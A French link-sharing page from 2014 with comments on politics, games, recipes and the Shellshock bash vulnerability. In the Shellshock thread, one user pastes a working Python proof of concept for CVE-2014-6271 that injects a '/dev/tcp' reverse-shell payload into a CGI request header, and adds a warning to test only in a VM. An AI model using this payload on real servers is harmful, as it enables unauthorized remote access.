qosgof, le 25/09/2014 à 13:59
Un sondage qui a été retiré assez rapidement par le Figaro...
Ça me fait mal au coeur de savoir que des gens s'informent par ce torchon...
(Permalink)

Les Petits Liens Malfaisants, le 25/09/2014 à 13:59
(Permalink)

Httqm, le 25/09/2014 à 13:50
Autant j'admets qu'il y a un bug (cf quelques notes ici : http://shaarli.callmematthi.eu/?dL5XSQ), mais certains titres (comme celui-ci, mais ce n'est pas le seul) ne verseraient-ils pas dans le catastrophisme voire dans le sensationnel ?

> l'interpréteur de lignes de commandes Bash, utilisé sur de nombreux systèmes GNU/Linux, avait une faille critique qui permettait de prendre discrètement le contrôle d'un serveur sans avoir à utiliser un compte d'administrateur.

Pour exploiter le bug en question, il faut préalablement avoir un accès au shell sur la machine visée pour créer une variable d'environnement. Laquelle va attendre bien sagement que je lance un nouveau shell (/bin/bash, en l’occurrence) pour s'exécuter. Qui plus est, l'environnement ne semble pas partagé entre les utilisateurs. Donc, (et sous réserve que je comprenne bien), ce bug ne peut servir qu'à créer une bombe logique qui risque de me péter à la tronche, et à moi seul ?

Dans le cas d'un script CGI sur Apache (comme expliqué ici : https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/), si l'exécution du CGI cause l'invocation d'un nouveau Bash, le code malicieux va effectivement s'exécuter à ce moment-là avec les droits d'Apache. Mais cela nécessite tout de même d'avoir eu accès au serveur préalablement en tant que www-data (qui est probablement en "nologin") pour enregistrer le code malicieux. Ou d'avoir demandé à un admin pas trop regardant de copier dans le /var/www un script qu'on lui a fourni.

Donc si quelqu'un qui maîtrise bien ces questions pouvait m'expliquer en quoi c'est vraiment "la caca - la cata - la catastrophe", ça m'aiderait à me coucher moins bête ce soir ;-)

EDIT : des détails ici (http://www.zataz.com/#axzz3EKuOTiVN) et un POC à tester (http://pastebin.com/raw.php?i=166f8Rjx)

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
(Permalink)

Httqm, le 26/09/2014 à 00:21
(oui, je me réponds à moi-même, et alors ?)

> Donc si quelqu'un qui maîtrise bien ces questions pouvait m'expliquer en quoi c'est vraiment "la caca - la cata - la catastrophe", ça m'aiderait à me coucher moins bête ce soir ;-)

Comme on n'est jamais si bien servi que par soi-même, je me suis amusé à mettre en oeuvre ladite faille, et c'est vrai que ça marche : avec une requête HTTP forgée, on peut prendre la main sur un serveur web vulnérable (uniquement en tant que "www-data", certes, mais ça suffit pour mettre toute la partie web par terre). Pour le détail et le tuto, c'est à voir ici : http://doc.callmematthi.eu/LinuxSecurity.html#pocShellshock

NB : avant que des petits malins aillent faire les foufous sur les internets, le simple fait d'ouvrir un shell distant s'appelle "intrusion et maintien dans un système automatisé de traitement de données". Si en plus vous jouez à modifier des trucs, c'est un peu plus grave. Donc on est bien d'accord : on joue A LA MAISON, dans une VM qu'on peut pourrir comme on veut, pour apprendre, pour le fun, ok ?
(Permalink)

Nemocorp, le 25/09/2014 à 13:49
J'ai dû rater ma vocation! Baron de la drogue c'est pas mal et il paraît que ça paye bien.
(Permalink)

Creposuke, le 25/09/2014 à 13:41
l'histoire du racisme inversé, c'est assez marrant et ça permet d'avoir un autre recul sur les souffrances des peuples ayant souffert de cette persécution.

(via un shaarli oublié sur le racisme)
(Permalink)

Riff, le 25/09/2014 à 13:16
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 13:06
Du DIY de produits de l'agroalimentaire ; ça s'adresse surtout aux ricains qui croient que la mayonnaise n'existe qu'en tube, mais il y a des idées sympas.
(Permalink)

Les Petits Liens Malfaisants, le 25/09/2014 à 13:59
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 13:05
Je suis tombé là dessus sur Imgur. Je n'ai pas tout compris à la recette, il manque des photos, mais j'ai capté l'idée générale et j'ai bien envie d'essayer ^^
(Permalink)

nekoblog, le 26/09/2014 à 16:46
Extrait : « This recipe for Salted Caramel & Dark Chocolate Blondies is rich and indulgent! It’s a recipe you won’t soon forget and you’ll be making again and again! »

*bave* #recette
(via http://sammyfisherjr.net/Shaarli/?35NlAg)
(Permalink)

@regishamann, le 25/09/2014 à 12:42
Le site Mediapart est en accès libre pendant 24h...
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 12:32
On dirait des vagues, mais ce sont bien des nuages. Joli.
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 12:25
C'est pas histoire d'enfoncer le clou, mais c'est trop bon...
(Permalink)

bill2, le 25/09/2014 à 12:19
La France, pays des droits de l'Homme, est "un des des pays démocratiques portant les plus graves atteintes à la liberté d’expression.".

Tout est dit. Cette loi est une aberration totale.
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 12:18
Je veux la même sur mon bureau ^^
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 11:59
L'histoire sans fin...
(Permalink)

Aloco, le 25/09/2014 à 11:48
J'aime bien toutes ces initiatives de jeu à coder.
(Permalink)

bill2, le 25/09/2014 à 11:47
Diablo 1 en HD, avec plein d'améliorations ...
Oh la vache ! Va falloir que je teste ça !
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 13:07
Jamais joué à Diablo. Je me mets ça de côté, pour le cas où je l’achèterai un jour.
via http://links.bill2-software.com/shaarli/?vk5cpw
(Permalink)

HowTommy, le 25/09/2014 à 14:29
Pas mal, après j'avais surtout accroché avec le second Diablo, le meilleur (avec son extension, le jeu était devenu... parfait).
(Permalink)

bill2, le 28/09/2014 à 18:31
Bon ben, test effectué :

- CD retrouvé : install du jeu en 30 secondes (si on joue depuis le PC, le fichier MPQ reste sur le CD, donc quasi rien à installer)
- blizzard, ce sont des boss pour programmer de bons jeux ! A peine installé, il fonctionne ... sur un Windows 7 64 bits, sans avoir besoin de patcher quoi que ce soit ! (jeu de 1997 je rappelle ...)
- install du mod : copier/coller des fichiers dans le répertoire d'install
- copie du fichier .mpq pour ne plus avoir besoin du CD
- ça se lance : seul "défaut" : faut d'abord créer un perso pour ensuite aller dans les paramètres et modifier la résolution en 1920 Full HD :)

Premières impressions :
- les graphismes, même en "HD", accusent un peu l'âge
- nouvelles classes de persos
- 3 tonnes de nouvelles fenêtres d'infos (perso, caractéristiques, inventaires, sorts, etc, coffre d'or agrandi à mort, etc)
- et la musique .... ah putain ! Que c'est bon de retrouver ça  !
- et la voix de Deckard Cain .... "stay for awhile and listen"

Oh putain, j'en ai presque les larmes aux yeux !!!

J'ai bien fait d'installer ça uniquement ce soir, sinon, mon WE était vraiment foutu !
(Permalink)

jeekajoo, le 25/09/2014 à 11:45
YEP.
(Permalink)

Yome, le 25/09/2014 à 11:25
Pas mal du tout ce shooting avec John Malkovich ! Le photographe Sandro Miller a reproduit des portraits célèbres avec John Malkovich dans le role du protagoniste.
Vraiment sympa.
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 12:59
Il y a beaucoup de retouches, ou bien ce type est un vrai caméléon ?
via http://links.yome.ch/?pC5wyw
(Permalink)

HowTommy, le 25/09/2014 à 11:17
Juste parce que les gens OUBLIENT
(Permalink)

Sammy Fisher Jr, le 25/09/2014 à 12:47
Belle présentation. Pour ceux qui n'aiment pas les chiffres, je conseille la lecture des Chroniques du règne de Nicolas 1er, par Patrick Rambaud. C'est drôle, mais tout est vrai ; du coup, on commence par rire, puis tout de suite après on fait la grimace...
via http://liens.howtommy.net/?r3dV_A
(Permalink)

Anadrark, le 25/09/2014 à 23:07
TL;DR
Mais ça fera sûrement du bien à certain qui ne s'en souviennent pas.
(Permalink)

Httqm > Anadrark, le 26/09/2014 à 00:33
Comme d'hab, c'est toujours marrant de tirer sur des ambulances, mais je note quelques trucs qui me font tiquer :
- la photo en tête de l'article : on y voit Nicolas Sarkozy (à la fin de son footing ?), en sweat, l'air fatigué, pas rasé. J'y vois un peu le même genre de manipulation qu'avec les photos de Michael Brown :
==> la version "clean" : http://www.ijreview.com/2014/08/168106-controversy-rages-images-media-presents-ferguson-shooting-victim-mike-brown/
==> la version "pas clean" : http://youngcons.com/new-photos-of-michael-brown-leaked-paint-a-different-picture-than-what-weve-seen/

Ensuite, d'après certains graphiques, les choses ont l'air de s'être améliorées, non ?
- déficit de la France (de 2010 à 2011, certes)
- déficit du budget de l'état : de 150 milliards en 2010 à 88 milliards en 2012
- la sécu : déficit en réduction constante depuis 2010. De 23.9 à 12.5 milliards (presque 50% !)

Bon, c'est jamais assez, c'est vrai, et le reste n'est pas tout rose non plus... Est-il le pire ? Parce qu'on a un sacré rigolo aux manettes en ce moment aussi...
(Permalink)

nekoblog, le 26/09/2014 à 16:54
Extrait : «  J'ai la nette impression qu'un grand nombre de Français ont oublié les quelques années passées et le bilan que la gauche a trouvé à son arrivée récente au pouvoir.

Alors il m'a semblé intéressant de dresser un bilan le plus complet possible pour que les mémoires des cancres et des  poissons rouges y compris dans la presse, puissent se remémorer d'où l'on vient et dans quel état Sarkozy a laissé la France.

A l'image de son parcours personnel au RPR puis à l'UMP, son quinquennat aura été chaotique, lui qui vantait aux Français une "République irréprochable". »

Je "coudifie". Et je prend note du conseil de Sammy pour "Chroniques du règne de Nicolas 1er" de Patrick Rambaud (EDIT : Ah ouais, c'est en 6 tomes quand même).
(via http://sammyfisherjr.net/Shaarli/?4bs50w)
(Permalink)

Yome, le 25/09/2014 à 11:06
Et voilà l'explication de ce qu'est Shellshock :
On définit une fonction et normalement lorsque le dernier } est fermé bash doit ignorer tout ce qui peut se trouver après. Si ce n'est pas le cas on peut alors faire tranquillement de l'injection de code.
CQFD.
(Permalink)

m0le, le 25/09/2014 à 12:13
wow, j'avais jamais entendu parlé de la faille shellshock °o°

via http://links.yome.ch/?kGgPQA
(Permalink)